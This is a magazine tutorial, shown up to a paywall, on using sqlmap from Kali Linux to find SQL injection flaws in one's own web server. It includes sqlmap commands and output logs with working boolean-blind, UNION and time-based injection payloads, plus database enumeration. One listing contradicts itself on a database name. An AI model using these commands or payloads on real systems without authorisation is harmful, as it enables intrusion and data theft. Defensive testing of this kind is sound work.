Using sqlmap to discover SQL vulnerabilities

The Tester

Article from Issue 173/2015
Author(s): , Author(s):

SQL injection is a big problem on the Internet. The handy sqlmap utility will tell you if you need to worry about an SQL attack in your own web environment.

SQL injection is one of the most common forms of network intrusion. An SQL injection attack typically exploits a problem in the SQL code – for instance, incorrect filtering for string literal escape characters or insufficient type checking. If you watch the Common Vulnerabilities and Exposures website [1], you'll see that new SQL injection attacks are discovered every week.

Software developers and Linux distribution maintainers are constantly watching for new SQL injection problems, which are often fixed through a security patch. However, many potential problems fall through the cracks – either on the development side or because a busy webmaster doesn't have time to install every patch and upgrade every system.

More importantly, some attack vectors haven't been discovered or adapted yet, so even if you do your best to keep your own systems up to date, it is still a good idea to look for potential problems yourself.

Most SQL injection attacks, however, require artificial, carefully crafted, and totally un-intuitive input. In other words, you almost have to be an expert to watch the security alerts and recreate every potential SQL attack on your own. Luckily, the security-minded admin can turn to a tool called sqlmap [2] to check for vulnerabilities in network-based SQL systems.

Sqlmap is an SQL-focused penetration testing tool that includes several useful options for discovering and attacking a SQL database. The easiest way to obtain sqlmap is to install or Live-boot a pen-testing Linux distro that comes with sqlmap pre-installed. In this article, I'll start up sqlmap from the Kali Linux Live system [3]. Kali is a Linux distribution specializing in security tools to assist in penetration testing, vulnerability detection, forensics, and other security-related tasks. You could also look for sqlmap in your Linux distro's package repositories, or you could download the source code from the sqlmap project website.

Sqlmap supports a number of database alternatives, including MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IMDB2, SQLite, and more. The sqlmap tool comes with automatic recognition of password hash formats and built-in support for dictionary attacks to crack passwords. Advanced features let you dump a complete database file, download and upload files to the database server, and even engage in privilege escalation using Metasploit's Meterpreter tool.

The Kali distro weighs in at less than 3GB and is available as a direct ISO download or torrent feed [4]. Kali is available in 32- and 64-bit versions for Intel processors and is also available for ARM processors. Kali supports forensic modes, USB, and straight installs. In this article, we describe how to improve your network's security using Kali Linux. If you decide to use Kali for your pen testing, see the Kali documentation at the project website [5] for more on getting a system up and running.

SQL Injection

SQL injection refers to methods that make a database server run SQL commands that were not intended by the application developer. Although vulnerability tools can usually find SQL vulnerabilities easily, some users might not realize their data is vulnerable. The steps described in this article can help you determine whether your data is susceptible to theft or compromise using SQL injection.

Thanks to sqlmap, you can look for SQL problems without advanced understanding of SQL programming techniques.

Information Gathering

Sqlmap is ideal for identifying vulnerabilities specific to your particular database version without actually having to know how to inject SQL code.

To get started determining whether a server is susceptible to a SQL injection attack, use the -u parameter with the sqlmap command to specify the URL you want to test. The command in Listing 1 (line 1) launches a test for the URL http://www.internalserver.com/looky.php?id=1.

Listing 1

Looking for a Vulnerable Database System

01 root@kali:~# sqlmap -u http://www.internalserver.com/looky.php?id=1
02
03     sqlmap/1.0-dev - automatic SQL injection and database takeover tool
04     http://sqlmap.org
05
06 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior \
   mutual consent is illegal. It is the end user's responsibility to obey all \
   applicable local, state and federal laws. Developers assume no liability \
   and are not responsible for any misuse or damage caused by this program
07
08 [*] starting at 21:02:17
09
10 [21:02:17] [INFO] testing connection to the target URL
11 [21:02:18] [INFO] testing if the target URL is stable. \
   This can take a couple of seconds
12 [21:02:19] [INFO] target URL is stable
13 [21:02:19] [INFO] testing if GET parameter 'id' is dynamic
14 [21:02:20] [INFO] confirming that GET parameter 'id' is dynamic
15 [21:02:20] [INFO] GET parameter 'id' is dynamic
16 [21:02:21] [INFO] heuristic (basic) test shows that GET parameter \
  'id' might be injectable (possible DBMS: 'MySQL')
17 [21:02:21] [INFO] testing for SQL injection on GET parameter 'id'
18 heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. \
   Do you want to skip test payloads specific for other DBMSes? [Y/n] y
19 do you want to include all tests for 'MySQL' extending provided level \
   (1) and risk (1)? [Y/n] y
20 [21:02:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
21 [21:02:34] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - \
   WHERE or HAVING clause' injectable
22 [21:02:34] [INFO] testing 'MySQL >= 5.0 AND error-based - \
   WHERE or HAVING clause'
23 ...
24 [21:02:40] [INFO] testing 'MySQL > 5.0.11 stacked queries'
25 [21:02:40] [WARNING] time-based comparison requires larger statistical \
   model, please wait.......
26 [21:02:44] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
27 [21:02:45] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
28 [21:03:05] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 \
   AND time-based blind' injectable
29 [21:03:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
30 [21:03:06] [INFO] automatically extending ranges for UNION query injection \
   technique tests as there is at least one other (potential) technique found
31 [21:03:06] [INFO] ORDER BY technique seems to be usable. This should reduce \
   the time needed to find the right number of query columns. Automatically \
   extending the range for current UNION query injection technique test
32 [21:03:08] [INFO] target URL appears to have 3 columns in query
33 [21:03:10] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - \
   1 to 20 columns' injectable
34 GET parameter 'id' is vulnerable. Do you want to keep testing the others \
   (if any)? [y/N] y
35 sqlmap identified the following injection points with a total of 41 \
   HTTP(s) requests:
36 ---
37 Place: GET
38 Parameter: id
39     Type: boolean-based blind
40     Title: AND boolean-based blind - WHERE or HAVING clause
41     Payload: id=1 AND 7449=7449
42
43     Type: UNION query
44     Title: MySQL UNION query (NULL) - 3 columns
45     Payload: id=-7199 UNION ALL SELECT NULL,NULL,CONCAT\
       (0x7161636671,0x4e776b7a52554b486776,0x7167716571)#
46
47     Type: AND/OR time-based blind
48     Title: MySQL > 5.0.11 AND time-based blind
49     Payload: id=1 AND SLEEP(5)
50 ---
51 [21:03:18] [INFO] the back-end DBMS is MySQL
52 web application technology: Apache, PHP 5.3.29
53 back-end DBMS: MySQL 5.0.11
54 [21:03:18] [INFO] fetched data logged to text files under \
   '/usr/share/sqlmap/output/www.internalserver.com'
55
56 [*] shutting down at 21:03:18
57
58 root@kali:~#

Sqlmap launches into a series of tests to look for vulnerabilities. The output in Listing 1 shows that the tests reveal that the database is injectable. Line 33, for instance, states:

GET parameter 'id' is 'MySQL UNION query (NULL) -- 1 to 20 columns' injectable

The tests in Listing 1 also reveal the database vendor and version: MySQL 5.0.11. As you can see in line 54, sqlmap saves the information it uncovers to a text file:

[21:03:18] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.internalserver.com'

Identifying Databases

Now that I know the database is vulnerable, the next step is to determine which databases are running on the MySQL server by using sqlmap with the -u parameter and the --dbs parameter (Listing 2).

Listing 2

Getting the Database Names

01 root@kali:~# sqlmap -u http://internalserver.com/looky.php?id=1 --dbs
02
03     sqlmap/1.0-dev - automatic SQL injection and database takeover tool
04     http://sqlmap.org
05
06 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior \
   mutual consent is illegal. It is the end user's responsibility to obey all \
   applicable local, state and federal laws. Developers assume no liability \
   and are not responsible for any misuse or damage caused by this program
07
08 [*] starting at 21:07:29
09
10 [21:07:29] [INFO] resuming back-end DBMS 'mysql'
11 [21:07:29] [INFO] testing connection to the target URL
12 sqlmap identified the following injection points with a total of \
   0 HTTP(s) requests:
13 ---
14 Place: GET
15 Parameter: id
16     Type: boolean-based blind
17     Title: AND boolean-based blind - WHERE or HAVING clause
18     Payload: id=1 AND 7449=7449
19
20     Type: UNION query
21     Title: MySQL UNION query (NULL) - 3 columns
22     Payload: id=-7199 UNION ALL SELECT NULL,NULL,CONCAT\
       (0x7161636671,0x4e776b7a52554b486776,0x7167716571)#
23
24     Type: AND/OR time-based blind
25     Title: MySQL > 5.0.11 AND time-based blind
26     Payload: id=1 AND SLEEP(5)
27 ---
28 [21:07:30] [INFO] the back-end DBMS is MySQL
29 web application technology: Apache, PHP 5.3.29
30 back-end DBMS: MySQL 5.0.11
31 [21:07:30] [INFO] fetching database names
32 [21:07:35] [INFO] the SQL query used returns 2 entries
33 [21:07:35] [INFO] retrieved: "information"
34 [21:07:36] [INFO] retrieved: "clients"
35 available databases [2]:
36 [*] information
37 [*] internalserver.com
38
39 [21:07:36] [INFO] fetched data logged to text files under \
   '/usr/share/sqlmap/output/www.internalserver.com'
40
41 [*] shutting down at 21:07:36
42
43 root@kali:~#

The output following the query in Listing 2 reveals that the database server has two databases: information and clients (lines 33 and 34). At this point in the pen test, the database owner will hopefully start to understand that the system is indeed at risk of an SQL injection.

Buy this article as PDF

Express-Checkout as PDF
Price $2.95
(incl. VAT)

Buy Linux Magazine

SINGLE ISSUES
 
SUBSCRIPTIONS
 
TABLET & SMARTPHONE APPS
Get it on Google Play

US / Canada

Get it on Google Play

UK / Australia

Related content

  • Security Lessons: Database Security

    Your database can be one of the most vulnerable elements in your organization. We share some tips for detecting and preventing attacks.

  • Intrusion 101

    You need to think like an attacker to keep your network safe. We asked security columnist Kurt Seifried for an inside look at the art of intrusion.

  • Web Security Dojo

    Protecting your own websites from attack either costs a lot of money or requires a lot of expertise. Web Security Dojo helps you learn to think like an expert.

  • Linux News

    News

    • Gnome 3.8 released
    • Aereo wins battle to stream broadcast TV

    openSUSE 12.3 Out

    • New browser engine
    • Pirates on the run
    • Ubuntu reduces non‑LTS support

    Projects

    • OpenDaylight open source framework
    • ASF promotes CloudStack
  • MySQL 5

    We’ll show you how some new features of MySQL 5 will improve software design and boost application performance.

comments powered by Disqus

Direct Download

Read full article as PDF:

Price $2.95

News

njobs Europe
What:
Where:
Country:
Njobs Netherlands Njobs Deutschland Njobs United Kingdom Njobs Italia Njobs France Njobs Espana Njobs Poland
Njobs Austria Njobs Denmark Njobs Belgium Njobs Czech Republic Njobs Mexico Njobs India Njobs Colombia